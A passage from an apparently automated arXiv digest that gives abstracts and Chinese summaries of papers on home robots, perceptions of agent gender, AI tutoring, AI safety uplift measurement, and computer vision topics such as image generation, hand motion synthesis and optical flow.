类目: Robotics (cs.RO); Human-Computer Interaction (cs.HC)
备注: 9 pages, 7 figures, 6 tables. Under review for IROS 2026
Abstract:Distributed multi-robot systems for the home often require robots to operate out of the user’s sight, creating a state awareness gap that can diminish trust and perceived transparency and control. This paper investigates whether real-time, socially mediated state externalization can bridge this gap without compromising task performance. We developed a system where a co-located social mediator robot (Pepper) externalizes the hidden execution states of an out-of-sight mobile manipulator (Stretch 3) for voice-driven object retrieval and delivery, where task-level states are synchronized and externalized through verbal updates and visual progress display. In a counterbalanced within-subject study (N=30), we compared a baseline of Autonomous Hidden Execution against Socially Mediated State Externalization. Our results show that externalization significantly increases user task-focused attention (from 15.8% to 84.6%, p < .001) and substantially improves perceived perspicuity, dependability, stimulation, and attractiveness (all p < .001). Furthermore, 83% of participants preferred the externalized condition, and this improvement in user experience was achieved without a statistically significant increase in end-to-end task completion time (p = .271). The results suggest that socially mediated state externalization is an effective architectural mechanism for designing more transparent and trustworthy distributed robot systems, ultimately enhancing user experience without sacrificing performance in distributed home robot deployments.
[HC-49] Operationalizing Perceptions of Agent Gender: Foundations and Guidelines
【速读】:该论文试图解决当前研究中关于智能体(intelligent agents)性别感知的测量标准缺失问题,即缺乏统一的定义、标注与测量方法,导致研究结果难以比较和整合。其解决方案的关键在于提出一个系统构建且理论驱动的元层级框架(meta-level framework),旨在提供操作上的清晰性与实践指导,从而提升研究的严谨性和包容性,并打破性别二元模型的局限及隐含的人类中心主义偏见。
链接: https://arxiv.org/abs/2603.26682
作者: Katie Seaborn,Madeleine Steeds,Ilaria Torre,Martina De Cet,Katie Winkle,Marcus Göransson
机构: Institute of Science Tokyo(东京科学研究所); University of Cambridge(剑桥大学); University College Dublin(都柏林大学); Chalmers University of Technology and University of Gothenburg(查尔姆斯理工大学和哥德堡大学); Uppsala University(乌普萨拉大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注:
Abstract:The “gender” of intelligent agents, virtual characters, social robots, and other agentic machines has emerged as a fundamental topic in studies of people’s interactions with computers. Perceptions of agent gender can help explain user attitudes and behaviours – from preferences to toxicity to stereotyping – across a variety of systems and contexts of use. Yet, standards in capturing perceptions of agent gender do not exist. A scoping review was conducted to clarify how agent gender has been operationalized – labelled, defined, and measured – as a perceptual variable. One-third of studies manipulated but did not measure agent gender. Norms in operationalizations remain obscure, limiting comprehension of results, congruity in measurement, and comparability for meta-analyses. The dominance of the gender binary model and latent anthropocentrism have placed arbitrary limits on knowledge generation and reified the status quo. We contribute a systematically-developed and theory-driven meta-level framework that offers operational clarity and practical guidance for greater rigour and inclusivity.
[HC-50] AI Meets Mathematics Education: A Case Study on Supporting an Instructor in a Large Mathematics Class with Context-Aware AI
【速读】:该论文旨在解决大规模高校课程中难以提供及时且可扩展的教学支持这一持续性难题。其解决方案的关键在于构建一个以用户为中心的、与授课教师紧密协作的AI辅助支持系统,通过在2,588条历史师生互动数据上微调轻量级语言模型,使AI能够准确回答学生在讨论区提出的问题;该模型在150个代表性问题上的基准测试中达到75.3%的准确率,并在36%的情况下被五位教师评价为等同或优于教师答案,同时结合混合人-AI工作流保障教学内容的安全性和有效性。
链接: https://arxiv.org/abs/2603.26679
作者: Jérémy Barghorn,Anna Sotnikova,Sacha Friedli,Antoine Bosselut
机构: École polytechnique fédérale de Lausanne(洛桑联邦理工学院)
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Human-Computer Interaction (cs.HC)
备注:
Abstract:Large-enrollment university courses face persistent challenges in providing timely and scalable instructional support. While generative AI holds promise, its effective use depends on reliability and pedagogical alignment. We present a human-centered case study of AI-assisted support in a Calculus I course, implemented in close collaboration with the course instructor. We developed a system to answer students’ questions on a discussion forum, fine-tuning a lightweight language model on 2,588 historical student-instructor interactions. The model achieved 75.3% accuracy on a benchmark of 150 representative questions annotated by five instructors, and in 36% of cases, its responses were rated equal to or better than instructor answers. Post-deployment student survey (N = 105) indicated that students valued the alignment of the responses with the course materials and their immediate availability, while still relying on the instructor verification for trust. We highlight the importance of hybrid human-AI workflows for safe and effective course support.
[HC-51] Evaluating Human-AI Safety: A Framework for Measuring Harmful Capability Uplift
【速读】:该论文试图解决当前AI安全评估过于依赖静态基准测试、第三方标注和红队测试,而忽视了用户实际能力提升带来的潜在风险问题。其解决方案的关键在于提出“有害能力提升”(harmful capability uplift)作为核心AI安全度量指标,即衡量用户在使用前沿模型后相较于传统工具所能增强的造成危害的能力边际增长,并基于社会科学研究提供系统性测量方法,推动开发者、研究者、资助方和监管机构将该评估纳入标准实践。
链接: https://arxiv.org/abs/2603.26676
作者: Michelle Vaccaro,Jaeyoon Song,Abdullah Almaatouq,Michiel A. Bakker
机构: Massachusetts Institute of Technology (麻省理工学院)
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Human-Computer Interaction (cs.HC)
备注:
Abstract:Current frontier AI safety evaluations emphasize static benchmarks, third-party annotations, and red-teaming. In this position paper, we argue that AI safety research should focus on human-centered evaluations that measure harmful capability uplift: the marginal increase in a user’s ability to cause harm with a frontier model beyond what conventional tools already enable. We frame harmful capability uplift as a core AI safety metric, ground it in prior social science research, and provide concrete methodological guidance for systematic measurement. We conclude with actionable steps for developers, researchers, funders, and regulators to make harmful capability uplift evaluation a standard practice.
[HC-52] Co-designing a Social Robot for Newcomer Children's Cultural and Language Learning
【速读】:该论文旨在解决新移民儿童在习得东道国语言及参与读写课程时面临的障碍问题,这些问题常因师资不足、学生语言能力混杂以及接触时间有限而加剧。研究提出的关键解决方案是通过与项目导师和协调员的共同设计(co-design)方法,探索社会助教机器人(Socially Assistive Robot, SAR)在这一敏感社会情感环境中的应用潜力。其核心在于基于专家经验提炼出四大典型挑战、探讨机器人在文化适应与社区归属感建构中的作用,并提出初步的设计指南,为将SAR整合进课堂提供可迭代优化的框架。
链接: https://arxiv.org/abs/2603.26674
作者: Neil Fernandes,Tehniyat Shahbaz,Emily Davies-Robinson,Yue Hu,Kerstin Dautenhahn
机构: University of Waterloo (滑铁卢大学); United for Literacy (联合识字组织)
类目: Robotics (cs.RO); Computers and Society (cs.CY); Human-Computer Interaction (cs.HC)
备注: In proceedings of the 21st ACM/IEEE International Conference on Human-Robot Interaction (HRI 2026)
Abstract:Newcomer children face barriers in acquiring the host country’s language and literacy programs are often constrained by limited staffing, mixed-proficiency cohorts, and short contact time. While Socially Assistive Robots (SARs) show promise in education, their use in these socio-emotionally sensitive settings remains underexplored. This research presents a co-design study with program tutors and coordinators, to explore the design space for a social robot, Maple. We contribute (1) a domain summary outlining four recurring challenges, (2) a discussion on cultural orientation and community belonging with robots, (3) an expert-grounded discussion of the perceived role of an SAR in cultural and language learning, and (4) preliminary design guidelines for integrating an SAR into a classroom. These expert-grounded insights lay the foundation for iterative design and evaluation with newcomer children and their families.
[HC-53] Statistics 101, 201, and 202: Three Shiny Apps for Teaching Probability Distributions, Inferential Statistics, and Simple Linear Regression
【速读】:该论文旨在解决统计学教学中学生因缺乏编程基础而难以进行统计计算与推理的问题。解决方案的关键在于开发了一套基于R语言和Shiny框架的开源交互式Web应用(Statistics 101、201和202),使学生无需掌握编程即可完成概率分布计算、置信区间构建、假设检验及简单线性回归建模等任务;每个应用同时提供数值结果、ggplot2生成的可视化图表以及MathJax渲染的数学推导过程,实现计算与统计推理在单一界面中的同步呈现,从而增强学习效果。
链接: https://arxiv.org/abs/2603.28274
作者: Antoine Soetewey
机构: HEC Liège, ULiège, Rue Louvrex 14, 4000 Liège, Belgium; UCLouvain; UNamur
类目: Other Statistics (stat.OT); Human-Computer Interaction (cs.HC); Programming Languages (cs.PL)
备注: 6 pages, 0 figure
Abstract:Statistics 101, 201, and 202 are three open-source interactive web applications built with R and Shiny to support the teaching of introductory statistics and probability. The apps help students carry out common statistical computations – computing probabilities from standard probability distributions, constructing confidence intervals, conducting hypothesis tests, and fitting simple linear regression models – without requiring prior knowledge of R or any other programming language. Each app provides numerical results, plots rendered with ggplot2, and inline mathematical derivations typeset with MathJax, so that computation and statistical reasoning appear side by side in a single interface. The suite is organised around a broad pedagogical progression: Statistics 101 introduces probability distributions and their properties; Statistics 201 addresses confidence intervals and hypothesis tests; and Statistics 202 covers the simple linear model. All three apps are freely accessible online and their source code is released under a CC-BY-4.0 license.
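这些应用本身用 R/Shiny 实现,但其暴露的计算本身是标准统计内容;下面用 Python 标准库给出一个最小示意(输入数值均为假设的示例值,并非来自这些应用):

```python
from statistics import NormalDist

# P(X <= 1.96) for X ~ N(0, 1): the kind of probability lookup
# Statistics 101 exposes (the input value 1.96 is illustrative).
p = NormalDist(mu=0, sigma=1).cdf(1.96)

def z_confidence_interval(mean, sd, n, level=0.95):
    """Two-sided z-interval for a mean with known sd,
    as covered by Statistics 201."""
    crit = NormalDist().inv_cdf((1 + level) / 2)  # critical value
    half = crit * sd / n ** 0.5                   # half-width of the interval
    return (mean - half, mean + half)

lo, hi = z_confidence_interval(mean=10.0, sd=2.0, n=100)
```

应用中每个这类数值结果旁边都配有对应的数学推导,即 MathJax 面板所渲染的内容。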
计算机视觉
[CV-0] Gen-Searcher: Reinforcing Agentic Search for Image Generation
【速读】:该论文旨在解决当前生成式 AI(Generative AI)图像模型因内部知识冻结而导致在需要外部知识或实时信息的现实场景中表现不佳的问题。其核心挑战在于如何使图像生成模型具备多跳推理与检索能力,从而获取必要的文本知识和参考图像以实现基于上下文的精准生成。解决方案的关键在于提出 Gen-Searcher,一个首次训练的搜索增强型图像生成智能体,通过构建定制化的数据流水线并创建两个高质量数据集(Gen-Searcher-SFT-10k 和 Gen-Searcher-RL-6k),结合监督微调(SFT)与双奖励反馈的代理强化学习(agentic reinforcement learning with dual reward feedback),其中奖励机制融合文本与图像维度,提升了训练稳定性与泛化能力。实验表明,该方法显著优于基线模型,在 KnowGen 和 WISE 基准上分别提升约 16 和 15 分。
链接: https://arxiv.org/abs/2603.28767
作者: Kaituo Feng,Manyuan Zhang,Shuang Chen,Yunlong Lin,Kaixuan Fan,Yilei Jiang,Hongyu Li,Dian Zheng,Chenyang Wang,Xiangyu Yue
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project page: this https URL Code: this https URL
Abstract:Recent image generation models have shown strong capabilities in generating high-fidelity and photorealistic images. However, they are fundamentally constrained by frozen internal knowledge, thus often failing on real-world scenarios that are knowledge-intensive or require up-to-date information. In this paper, we present Gen-Searcher, as the first attempt to train a search-augmented image generation agent, which performs multi-hop reasoning and search to collect the textual knowledge and reference images needed for grounded generation. To achieve this, we construct a tailored data pipeline and curate two high-quality datasets, Gen-Searcher-SFT-10k and Gen-Searcher-RL-6k, containing diverse search-intensive prompts and corresponding ground-truth synthesis images. We further introduce KnowGen, a comprehensive benchmark that explicitly requires search-grounded external knowledge for image generation and evaluates models from multiple dimensions. Based on these resources, we train Gen-Searcher with SFT followed by agentic reinforcement learning with dual reward feedback, which combines text-based and image-based rewards to provide more stable and informative learning signals for GRPO training. Experiments show that Gen-Searcher brings substantial gains, improving Qwen-Image by around 16 points on KnowGen and 15 points on WISE. We hope this work can serve as an open foundation for search agents in image generation, and we fully open-source our data, models, and code.
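上述双奖励(dual reward)思想可用如下草图示意;其中文本/图像奖励的凸组合权重与组均值基线均为示意性假设,并非论文 GRPO 训练的精确公式:

```python
def dual_reward(text_score, image_score, w_text=0.5):
    """Illustrative convex combination of a text-based and an
    image-based reward (the weighting scheme is an assumption)."""
    return w_text * text_score + (1 - w_text) * image_score

def group_relative_advantages(rewards):
    """Group-relative advantages in the spirit of GRPO:
    each rollout's reward minus the group mean."""
    mean = sum(rewards) / len(rewards)
    return [r - mean for r in rewards]

# Three rollouts for one prompt, each scored on both axes (toy values).
group = [dual_reward(t, i) for t, i in [(0.9, 0.7), (0.2, 0.4), (0.6, 0.6)]]
adv = group_relative_advantages(group)
```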
[CV-1] HandX: Scaling Bimanual Motion and Interaction Generation CVPR2026
【速读】:该论文旨在解决当前人体运动合成领域中手部精细动作与双手协作行为建模不足的问题,尤其是现有全身模型难以捕捉指关节活动、接触时机及双侧手协调等细微特征,且缺乏高质量的双人手交互数据集。其解决方案的关键在于构建一个统一的基础框架 HandX,涵盖数据、标注与评估三方面:首先整合并筛选现有数据集以提升质量,并采集新的高保真双人手动作捕捉数据;其次提出一种解耦式标注策略,通过提取关键运动特征(如接触事件和手指屈曲)并结合大语言模型进行语义推理,实现细粒度、语义丰富的描述;最终基于此数据和标注体系,对扩散模型和自回归模型进行基准测试,验证了模型规模与数据质量对生成更语义一致的双人手动作具有显著正向影响。
链接: https://arxiv.org/abs/2603.28766
作者: Zimu Zhang,Yucheng Zhang,Xiyan Xu,Ziyin Wang,Sirui Xu,Kai Zhou,Bing Zhou,Chuan Guo,Jian Wang,Yu-Xiong Wang,Liang-Yan Gui
机构: University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校); Specs Inc. (Specs公司); Snap Inc. (Snap公司)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026. Project Page: this https URL . Code: this https URL
Abstract:Synthesizing human motion has advanced rapidly, yet realistic hand motion and bimanual interaction remain underexplored. Whole-body models often miss the fine-grained cues that drive dexterous behavior, finger articulation, contact timing, and inter-hand coordination, and existing resources lack high-fidelity bimanual sequences that capture nuanced finger dynamics and collaboration. To fill this gap, we present HandX, a unified foundation spanning data, annotation, and evaluation. We consolidate and filter existing datasets for quality, and collect a new motion-capture dataset targeting underrepresented bimanual interactions with detailed finger dynamics. For scalable annotation, we introduce a decoupled strategy that extracts representative motion features, e.g., contact events and finger flexion, and then leverages reasoning from large language models to produce fine-grained, semantically rich descriptions aligned with these features. Building on the resulting data and annotations, we benchmark diffusion and autoregressive models with versatile conditioning modes. Experiments demonstrate high-quality dexterous motion generation, supported by our newly proposed hand-focused metrics. We further observe clear scaling trends: larger models trained on larger, higher-quality datasets produce more semantically coherent bimanual motion. Our dataset is released to support future research.
[CV-2] PoseDreamer: Scalable and Photorealistic Human Data Generation Pipeline with Diffusion Models
【速读】:该论文旨在解决3D人体网格估计任务中高质量标注数据获取困难的问题,现有方法要么依赖人工标注的实拍数据(规模有限),要么使用渲染合成数据(缺乏真实感、多样性不足且成本高)。其解决方案的关键在于提出PoseDreamer——一个基于扩散模型(diffusion models)生成大规模带3D网格标注的合成数据的新范式。该方法通过可控图像生成与直接偏好优化(Direct Preference Optimization)实现控制对齐、课程学习式难样本挖掘以及多阶段质量过滤,从而在保证图像与3D标签间自然对应关系的同时,优先覆盖挑战性样本,显著提升数据集实用性。实验表明,PoseDreamer生成的数据在图像质量上较传统渲染数据提升76%,且训练模型性能优于或媲美真实和传统合成数据集,并展现出与真实数据互补的优势。
链接: https://arxiv.org/abs/2603.28763
作者: Lorenza Prospero,Orest Kupyn,Ostap Viniavskyi,João F. Henriques,Christian Rupprecht
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Acquiring labeled datasets for 3D human mesh estimation is challenging due to depth ambiguities and the inherent difficulty of annotating 3D geometry from monocular images. Existing datasets are either real, with manually annotated 3D geometry and limited scale, or synthetic, rendered from 3D engines that provide precise labels but suffer from limited photorealism, low diversity, and high production costs. In this work, we explore a third path: generated data. We introduce PoseDreamer, a novel pipeline that leverages diffusion models to generate large-scale synthetic datasets with 3D mesh annotations. Our approach combines controllable image generation with Direct Preference Optimization for control alignment, curriculum-based hard sample mining, and multi-stage quality filtering. Together, these components naturally maintain correspondence between 3D labels and generated images, while prioritizing challenging samples to maximize dataset utility. Using PoseDreamer, we generate more than 500,000 high-quality synthetic samples, achieving a 76% improvement in image-quality metrics compared to rendering-based datasets. Models trained on PoseDreamer achieve performance comparable to or superior to those trained on real-world and traditional synthetic datasets. In addition, combining PoseDreamer with synthetic datasets results in better performance than combining real-world and synthetic datasets, demonstrating the complementary nature of our dataset. We will release the full dataset and generation code.
[CV-3] On-the-fly Repulsion in the Contextual Space for Rich Diversity in Diffusion Transformers SIGGRAPH2026
【速读】:该论文旨在解决当前文本到图像(Text-to-Image, T2I)扩散模型中存在的典型性偏差(typicality bias)问题,即模型在生成图像时倾向于收敛到少数几个视觉上相似的解,缺乏多样性,从而限制了其在创意类应用中的潜力。解决方案的关键在于提出一种在“上下文空间”(Contextual Space)中施加排斥力(repulsion)的新框架,通过在扩散 Transformer 的前向传播过程中干预多模态注意力通道,在文本条件与图像结构融合后的中间层块之间注入实时排斥机制,从而在结构已初步形成但尚未固定时引导生成轨迹。该方法能够在不牺牲视觉保真度或语义一致性的情况下显著提升多样性,且计算开销极小,尤其适用于现代“Turbo”和蒸馏模型,传统基于轨迹干预的方法在此类模型中通常失效。
链接: https://arxiv.org/abs/2603.28762
作者: Omer Dahary,Benaya Koren,Daniel Garibi,Daniel Cohen-Or
机构: Tel Aviv University (特拉维夫大学); Snap Research (Snap研究机构)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Graphics (cs.GR); Machine Learning (cs.LG)
备注: Conditionally accepted to SIGGRAPH 2026. Project page: this https URL
Abstract:Modern Text-to-Image (T2I) diffusion models have achieved remarkable semantic alignment, yet they often suffer from a significant lack of variety, converging on a narrow set of visual solutions for any given prompt. This typicality bias presents a challenge for creative applications that require a wide range of generative outcomes. We identify a fundamental trade-off in current approaches to diversity: modifying model inputs requires costly optimization to incorporate feedback from the generative path. In contrast, acting on spatially-committed intermediate latents tends to disrupt the forming visual structure, leading to artifacts. In this work, we propose to apply repulsion in the Contextual Space as a novel framework for achieving rich diversity in Diffusion Transformers. By intervening in the multimodal attention channels, we apply on-the-fly repulsion during the transformer’s forward pass, injecting the intervention between blocks where text conditioning is enriched with emergent image structure. This allows for redirecting the guidance trajectory after it is structurally informed but before the composition is fixed. Our results demonstrate that repulsion in the Contextual Space produces significantly richer diversity without sacrificing visual fidelity or semantic adherence. Furthermore, our method is uniquely efficient, imposing a small computational overhead while remaining effective even in modern “Turbo” and distilled models where traditional trajectory-based interventions typically fail.
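作为"排斥"机制的一个粗略几何类比(论文作用于扩散 Transformer 内部的多模态注意力通道,而非原始二维向量;下面的步长与质心形式均为示意性假设):

```python
# Each parallel sample's context vector is pushed away from the
# centroid of the *other* samples, increasing mutual separation.
def repel(vectors, step=0.1):
    n = len(vectors)
    out = []
    for i, v in enumerate(vectors):
        others = [vectors[j] for j in range(n) if j != i]
        centroid = [sum(c) / len(others) for c in zip(*others)]
        out.append([vi + step * (vi - ci) for vi, ci in zip(v, centroid)])
    return out

vs = [[1.0, 0.0], [0.9, 0.1], [0.0, 1.0]]   # toy 2-D "context" vectors
pushed = repel(vs)
```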
[CV-4] SHOW3D: Capturing Scenes of 3D Hands and Objects in the Wild CVPR2026
【速读】:该论文旨在解决第一人称视角计算机视觉(egocentric computer vision)中对人体手部与物体交互的三维理解(3D understanding)难题,尤其是现有手-物交互数据集多在受控演播室环境中采集,导致模型泛化能力受限的问题。其解决方案的关键在于提出了一种无标记的多摄像头捕捉系统(marker-less multi-camera system),该系统通过轻量化背挂式多相机阵列与用户佩戴的VR头显同步校准,实现了在真实野外环境下的近自由移动捕捉,并结合第一人称-第三人称协同跟踪流程(ego-exo tracking pipeline)生成高精度的3D标注,从而显著缓解了环境真实性与3D标注准确性之间的权衡矛盾。
链接: https://arxiv.org/abs/2603.28760
作者: Patrick Rim,Kevin Harris,Braden Copple,Shangchen Han,Xu Xie,Ivan Shugurov,Sizhe An,He Wen,Alex Wong,Tomas Hodan,Kun He
机构: Meta Reality Labs (Meta现实实验室); Yale University (耶鲁大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: CVPR 2026
Abstract:Accurate 3D understanding of human hands and objects during manipulation remains a significant challenge for egocentric computer vision. Existing hand-object interaction datasets are predominantly captured in controlled studio settings, which limits both environmental diversity and the ability of models trained on such data to generalize to real-world scenarios. To address this challenge, we introduce a novel marker-less multi-camera system that allows for nearly unconstrained mobility in genuinely in-the-wild conditions, while still having the ability to generate precise 3D annotations of hands and objects. The capture system consists of a lightweight, back-mounted, multi-camera rig that is synchronized and calibrated with a user-worn VR headset. For 3D ground-truth annotation of hands and objects, we develop an ego-exo tracking pipeline and rigorously evaluate its quality. Finally, we present SHOW3D, the first large-scale dataset with 3D annotations that show hands interacting with objects in diverse real-world environments, including outdoor settings. Our approach significantly reduces the fundamental trade-off between environmental realism and accuracy of 3D annotations, which we validate with experiments on several downstream tasks. this http URL
[CV-5] FlowIt: Global Matching for Optical Flow with Confidence-Guided Refinement
【速读】:该论文旨在解决光学流估计(optical flow estimation)中因大像素位移导致的匹配不准确问题,尤其在处理长距离运动和遮挡区域时传统方法表现不佳。其解决方案的关键在于提出一种基于分层Transformer架构的新型网络FlowIt,通过全局上下文建模增强对长程对应关系的捕捉能力;同时将初始光流估计建模为最优传输(optimal transport)问题,从而获得鲁棒的初始光流场及显式生成的遮挡图与置信度图;随后引入引导精修阶段,利用高置信度区域的可靠运动信息向低置信度区域传播,显著提升整体估计精度。
链接: https://arxiv.org/abs/2603.28759
作者: Sadra Safadoust,Fabio Tosi,Matteo Poggi,Fatma Güney
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We present FlowIt, a novel architecture for optical flow estimation designed to robustly handle large pixel displacements. At its core, FlowIt leverages a hierarchical transformer architecture that captures extensive global context, enabling the model to effectively model long-range correspondences. To overcome the limitations of localized matching, we formulate the flow initialization as an optimal transport problem. This formulation yields a highly robust initial flow field, alongside explicitly derived occlusion and confidence maps. These cues are then seamlessly integrated into a guided refinement stage, where the network actively propagates reliable motion estimates from high-confidence regions into ambiguous, low-confidence areas. Extensive experiments across the Sintel, KITTI, Spring, and LayeredFlow datasets validate the efficacy of our approach. FlowIt achieves state-of-the-art results on the competitive Sintel and KITTI benchmarks, while simultaneously establishing new state-of-the-art cross-dataset zero-shot generalization performance on Sintel, Spring, and LayeredFlow.
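光流初始化的最优传输形式可以用一个极小的熵正则化 OT(Sinkhorn)求解器来示意;这只是均匀边缘分布下的通用草图,并非 FlowIt 实际的代价构造或求解细节:

```python
import math

def sinkhorn(cost, reg=0.1, iters=200):
    """Entropy-regularized optimal transport (Sinkhorn iteration)
    with uniform marginals; returns the transport plan."""
    n, m = len(cost), len(cost[0])
    K = [[math.exp(-c / reg) for c in row] for row in cost]
    u, v = [1.0] * n, [1.0] * m
    for _ in range(iters):
        u = [1.0 / n / sum(K[i][j] * v[j] for j in range(m)) for i in range(n)]
        v = [1.0 / m / sum(K[i][j] * u[i] for i in range(n)) for j in range(m)]
    return [[u[i] * K[i][j] * v[j] for j in range(m)] for i in range(n)]

# Toy matching cost: feature i in frame 1 vs feature j in frame 2.
cost = [[0.0, 1.0], [1.0, 0.0]]
plan = sinkhorn(cost)
# Each row's argmax gives the matched target, i.e. an initial flow.
matches = [max(range(2), key=lambda j: plan[i][j]) for i in range(2)]
```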
[CV-6] SonoWorld: From One Image to a 3D Audio-Visual Scene CVPR2026
【速读】:该论文旨在解决从单张图像生成沉浸式3D音视频场景(Image2AVScene)的问题,以弥补现有视觉场景生成技术在音频维度上的缺失。其核心挑战在于如何将静态图像扩展为具有空间一致性的3D环境,并同步生成与场景几何和语义对齐的三维音频(3D audio)。解决方案的关键在于提出SonoWorld框架,该框架包含四个关键步骤:首先通过outpainting生成360°全景图,继而将其提升为可导航的3D场景;随后基于语言引导放置声源锚点(sound anchors),最后渲染ambisonics格式的点声源、区域声源和环境声源,从而实现空间音频与场景结构的精确匹配。这一方法显著提升了音视频协同的沉浸感,并在真实世界数据集和用户实验中得到验证。
链接: https://arxiv.org/abs/2603.28757
作者: Derong Jin,Xiyi Chen,Ming C. Lin,Ruohan Gao
机构: University of Maryland, College Park
类目: Computer Vision and Pattern Recognition (cs.CV); Multimedia (cs.MM); Sound (cs.SD)
备注: Accepted by CVPR 2026, project page: this https URL
Abstract:Tremendous progress in visual scene generation now turns a single image into an explorable 3D world, yet immersion remains incomplete without sound. We introduce Image2AVScene, the task of generating a 3D audio-visual scene from a single image, and present SonoWorld, the first framework to tackle this challenge. From one image, our pipeline outpaints a 360° panorama, lifts it into a navigable 3D scene, places language-guided sound anchors, and renders ambisonics for point, areal, and ambient sources, yielding spatial audio aligned with scene geometry and semantics. Quantitative evaluations on a newly curated real-world dataset and a controlled user study confirm the effectiveness of our approach. Beyond free-viewpoint audio-visual rendering, we also demonstrate applications to one-shot acoustic learning and audio-visual spatial source separation. Project website: this https URL
[CV-7] Pandora: Articulated 3D Scene Graphs from Egocentric Vision BMVC
【速读】:该论文旨在解决当前机器人映射系统在构建度量-语义场景表示时存在的局限性问题,即依赖于机器人自身传感器和视角所生成的“第一人称”地图往往因机器人本体能力不足(如无法打开抽屉或触及高处柜子)而导致环境信息不完整,从而限制了其对复杂场景的理解与操作能力。解决方案的关键在于利用人类佩戴Project Aria眼镜自然探索场景时采集的自我中心(egocentric)数据,通过简单启发式方法恢复出可动物体部件(articulate object parts)的模型,并将其集成到3D场景图(3D scene graph)中,从而实现从人类经验到机器人部署的直接知识迁移,显著提升了机器人对物体动态及容器关系的理解能力,最终增强其移动操作任务的执行效果。
链接: https://arxiv.org/abs/2603.28732
作者: Alan Yu,Yun Chang,Christopher Xie,Luca Carlone
机构: Massachusetts Institute of Technology (麻省理工学院); Meta Reality Labs (Meta现实实验室)
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: 14 pages, 5 figures. Presented at the 2025 British Machine Vision Conference (BMVC) in Sheffield, UK
Abstract:Robotic mapping systems typically approach building metric-semantic scene representations from the robot’s own sensors and cameras. However, these “first person” maps inherit the robot’s own limitations due to its embodiment or skillset, which may leave many aspects of the environment unexplored. For example, the robot might not be able to open drawers or access wall cabinets. In this sense, the map representation is not as complete, and requires a more capable robot to fill in the gaps. We narrow these blind spots in current methods by leveraging egocentric data captured as a human naturally explores a scene wearing Project Aria glasses, giving a way to directly transfer knowledge about articulation from the human to any deployable robot. We demonstrate that, by using simple heuristics, we can leverage egocentric data to recover models of articulate object parts, with quality comparable to those of state-of-the-art methods based on other input modalities. We also show how to integrate these models into 3D scene graph representations, leading to a better understanding of object dynamics and object-container relationships. We finally demonstrate that these articulated 3D scene graphs enhance a robot’s ability to perform mobile manipulation tasks, showcasing an application where a Boston Dynamics Spot is tasked with retrieving concealed target items, given only the 3D scene graph as input.
[CV-8] Stepwise Credit Assignment for GRPO on Flow-Matching Models CVPR
【速读】:该论文旨在解决Flow-GRPO在应用于扩散模型(diffusion models)时存在的信用分配(credit assignment)不合理问题:传统方法对所有生成步骤采用均匀信用分配,忽略了扩散过程中的时序结构——早期步骤主要决定图像的低频结构(如内容与构图),而后期步骤则负责高频细节(如纹理)。这种均匀分配可能导致次优中间步骤被错误奖励,尤其是当错误在后续步骤中被修正时。解决方案的关键在于提出Stepwise-Flow-GRPO,通过基于每一步奖励改进的逐步信用分配机制,利用Tweedie公式估计中间奖励,并引入基于增益的优势函数(gain-based advantages),从而显著提升样本效率和收敛速度;同时设计了一种受DDIM启发的随机微分方程(SDE),在保持策略梯度所需随机性的同时优化奖励质量。
链接: https://arxiv.org/abs/2603.28718
作者: Yash Savani,Branislav Kveton,Yuchen Liu,Yilin Wang,Jing Shi,Subhojyoti Mukherjee,Nikos Vlassis,Krishna Kumar Singh
机构: Carnegie Mellon University (卡内基梅隆大学); Adobe Research (Adobe 研究院)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR), 2026 Project page: this https URL
Abstract:Flow-GRPO successfully applies reinforcement learning to flow models, but uses uniform credit assignment across all steps. This ignores the temporal structure of diffusion generation: early steps determine composition and content (low-frequency structure), while late steps resolve details and textures (high-frequency details). Moreover, assigning uniform credit based solely on the final image can inadvertently reward suboptimal intermediate steps, especially when errors are corrected later in the diffusion trajectory. We propose Stepwise-Flow-GRPO, which assigns credit based on each step’s reward improvement. By leveraging Tweedie’s formula to obtain intermediate reward estimates and introducing gain-based advantages, our method achieves superior sample efficiency and faster convergence. We also introduce a DDIM-inspired SDE that improves reward quality while preserving stochasticity for policy gradients.
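其中基于增益的信用分配可如下示意,假设各步奖励已通过对每步的 Tweedie x0 估计打分获得(下面的奖励数值仅为示例):

```python
def stepwise_gains(step_rewards):
    """step_rewards[t] = reward of the Tweedie x0-estimate after step t;
    each denoising step is credited with its reward *improvement*."""
    return [r1 - r0 for r0, r1 in zip(step_rewards, step_rewards[1:])]

def normalized_advantages(gains):
    """Standardize gains into advantages (a common normalization;
    the paper's exact normalization may differ)."""
    mean = sum(gains) / len(gains)
    var = sum((g - mean) ** 2 for g in gains) / len(gains)
    std = var ** 0.5 or 1.0
    return [(g - mean) / std for g in gains]

rewards = [0.1, 0.4, 0.5, 0.9]   # an improving trajectory (toy values)
gains = stepwise_gains(rewards)  # per-step improvements
adv = normalized_advantages(gains)
```

与对所有步骤分配同一最终奖励的均匀方案不同,各步增益之和恰为首末奖励之差,因此信用被精确分解到每一步。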
[CV-9] DreamLite: A Lightweight On-Device Unified Model for Image Generation and Editing
